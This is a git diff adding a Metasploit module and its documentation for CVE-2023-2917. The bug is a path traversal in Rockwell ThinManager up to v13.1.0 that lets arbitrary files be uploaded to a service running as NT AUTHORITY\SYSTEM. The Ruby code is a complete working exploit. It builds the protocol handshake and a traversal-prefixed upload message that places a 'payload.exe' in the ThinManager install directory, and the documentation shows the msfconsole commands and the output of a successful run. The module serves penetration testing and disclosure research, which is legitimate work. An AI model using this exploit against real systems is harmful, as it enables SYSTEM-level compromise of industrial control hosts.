diff --git a/documentation/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.md b/documentation/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.md new file mode 100644 index 000000000000..4056729deabd --- /dev/null +++ b/documentation/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.md @@ -0,0 +1,62 @@ +## Vulnerable Application + +This module exploits a path traversal vulnerability in ThinManager <= v13.1.0 (CVE-2023-2917) to upload an arbitrary file to the target +system. + +The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM. + +## Testing + +The software can be obtained from +[the vendor](https://thinmanager.com/downloads/). + +**Successfully tested on** + +- ThinManager v13.1.0 on Windows 22H2 +- ThinManager v13.0.1 on Windows 22H2 +- ThinManager v12.0.0 on Windows 22H2 +- ThinManager v12.1.5 on Windows 22H2 +- ThinManager v12.0.4 on Windows 22H2 + +## Verification Steps + +1. Install and run the application +2. Start `msfconsole` and run the following commands: + +``` +msf6 > use auxiliary/admin/networking/thinmanager_traversal_upload2 +msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > set RHOSTS +msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > set LFILE +msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > set RFILE +msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > run +``` + +This should upload the local file specified through LFILE to the server, as specified in RFILE. + +## Options + +### LFILE +Specifies the local file to upload to the remote server. + +### RFILE +Specifies the remote file location where the file will be uploaded to. + +## Scenarios + +Running the exploit against ThinManager v13.1.0 on Windows 22H2 should result in an output similar to the following: + +``` +msf6 auxiliary(admin/networking/thinmanager_traversal_upload2) > run +[*] Running module against 192.168.137.229 + +[*] 192.168.137.229:2031 - Running automatic check ("set AutoCheck false" to disable) +[!] 192.168.137.229:2031 - The service is running, but could not be validated. +[*] 192.168.137.229:2031 - Sending handshake... +[*] 192.168.137.229:2031 - Received handshake response. +[*] 192.168.137.229:2031 - Read 27648 bytes from /tmp/payload.exe +[*] 192.168.137.229:2031 - Uploading /tmp/payload.exe as /Program Files/Rockwell Software/ThinManager/payload.exe on the remote host... +[*] 192.168.137.229:2031 - Upload request length: 27752 bytes +[!] 192.168.137.229:2031 - No response received after upload. +[+] 192.168.137.229:2031 - Upload process completed. Check if '/Program Files/Rockwell Software/ThinManager/payload.exe' exists on the target. +[*] Auxiliary module execution completed +``` diff --git a/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb b/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb new file mode 100644 index 000000000000..399b44158a7b --- /dev/null +++ b/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb @@ -0,0 +1,162 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload', + 'Description' => %q{ + This module exploits a path traversal vulnerability (CVE-2023-2917) in ThinManager <= v13.1.0 to upload arbitrary files to the target system. + + The affected service listens by default on TCP port 2031 and runs in the context of NT AUTHORITY\SYSTEM. + }, + 'Author' => [ + 'Michael Heinzl', # MSF Module + 'Tenable' # Discovery and PoC + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2023-2917 '], + ['URL', 'https://www.tenable.com/security/research/tra-2023-28'], + ['URL', 'https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471'] + ], + 'DisclosureDate' => '2023-08-17', + 'DefaultOptions' => { + 'RPORT' => 2031, + 'SSL' => 'False' + }, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + ) + ) + + register_options( + [ + OptPath.new('LFILE', [false, 'The local file to transfer to the remote system.', '/tmp/payload.exe']), + OptString.new('RFILE', [false, 'The file path to store the file on the remote system.', '/Program Files/Rockwell Software/ThinManager/payload.exe']), + OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 7 ]) + ] + ) + end + + def check + begin + connect + rescue Rex::ConnectionTimeout + print_error("Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed.") + return Exploit::CheckCode::Unknown + end + + vprint_status('Sending handshake...') + handshake = [0x100].pack('V') + vprint_status(Rex::Text.to_hex_dump(handshake)) + sock.put(handshake) + + res = sock.get_once(4096, 5) + expected_header = "\x00\x04\x00\x01\x00\x00\x00\x08".b + + if res&.start_with?(expected_header) + vprint_status('Received handshake response.') + vprint_status(Rex::Text.to_hex_dump(res)) + disconnect + return Exploit::CheckCode::Detected + elsif res + vprint_status('Received unexpected handshake response:') + vprint_status(Rex::Text.to_hex_dump(res)) + disconnect + return Exploit::CheckCode::Safe + else + disconnect + return Exploit::CheckCode::Unknown('No handshake response received.') + end + end + + def mk_msg(msg_type, flags, data) + dlen = data.length + hdr = [msg_type, flags, dlen].pack('nnN') + hdr + data + end + + def run + begin + connect + rescue Rex::ConnectionTimeout => e + fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed: #{e.message}") + end + + print_status('Sending handshake...') + handshake = [0x100].pack('V') + vprint_status(Rex::Text.to_hex_dump(handshake)) + sock.put(handshake) + + res = sock.get_once(4096, 5) + if res + print_status('Received handshake response.') + vprint_status(Rex::Text.to_hex_dump(res)) + else + print_error('No handshake response received.') + fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed: #{e.message}") + end + + lfile = datastore['LFILE'] + rfile = datastore['RFILE'] + file_data = ::File.binread(lfile) + print_status("Read #{file_data.length} bytes from #{lfile}") + + traversal = '../' * datastore['DEPTH'] + + full_path = (traversal + rfile).force_encoding('ASCII-8BIT') + file_data.force_encoding('ASCII-8BIT') + + begin + data = [0xaa].pack('N') + data << [0xbb].pack('N') + data << full_path + "\x00" + data << "file_type\x00" + data << "unk_str3\x00" + data << "unk_str4\x00" + data << [file_data.length].pack('N') + data << [file_data.length].pack('N') + data << file_data + data.force_encoding('ASCII-8BIT') + + req = mk_msg(38, 0x0021, data) + rescue StandardError => e + fail_with(Failure::BadConfig, "Failed to build upload request: #{e.class} - #{e.message}") + end + + print_status("Uploading #{lfile} as #{rfile} on the remote host...") + + print_status("Upload request length: #{req.length} bytes") + vprint_status("Upload request:\n#{Rex::Text.to_hex_dump(req)}") + + sock.put(req) + + begin + res = sock.get_once(4096, 5) + if res + print_good('Received response from target:') + vprint_status(Rex::Text.to_hex_dump(res)) + else + print_warning('No response received after upload.') + end + rescue ::EOFError, ::Timeout::Error => e + print_error("Socket error: #{e.class} - #{e.message}") + end + + disconnect + print_good("Upload process completed. Check if '#{rfile}' exists on the target.") + end + +end